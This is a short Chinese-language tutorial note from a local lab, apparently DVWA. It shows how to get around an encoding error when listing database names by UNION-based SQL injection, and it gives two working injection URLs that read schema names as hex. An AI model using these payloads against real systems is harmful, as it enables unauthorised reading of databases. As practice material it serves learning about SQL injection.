1.在本地测试的时候,发现一个错误哦
sql 注入进行查看所有数据库名的时候,
百度查看,说的是编码问题,本地测试还能改一下编码,实战怎么办~
解决办法:
使用16进制进行读取
http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata #&Submit=Submit# 最开始payload。
http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union select 1,hex(schema_name) from information_schema.schemata #&Submit=Submit# 16进制读取payload。
上面的Surname 是读取出来的数据库名 16 进制。
解码一下16进制就可以了。
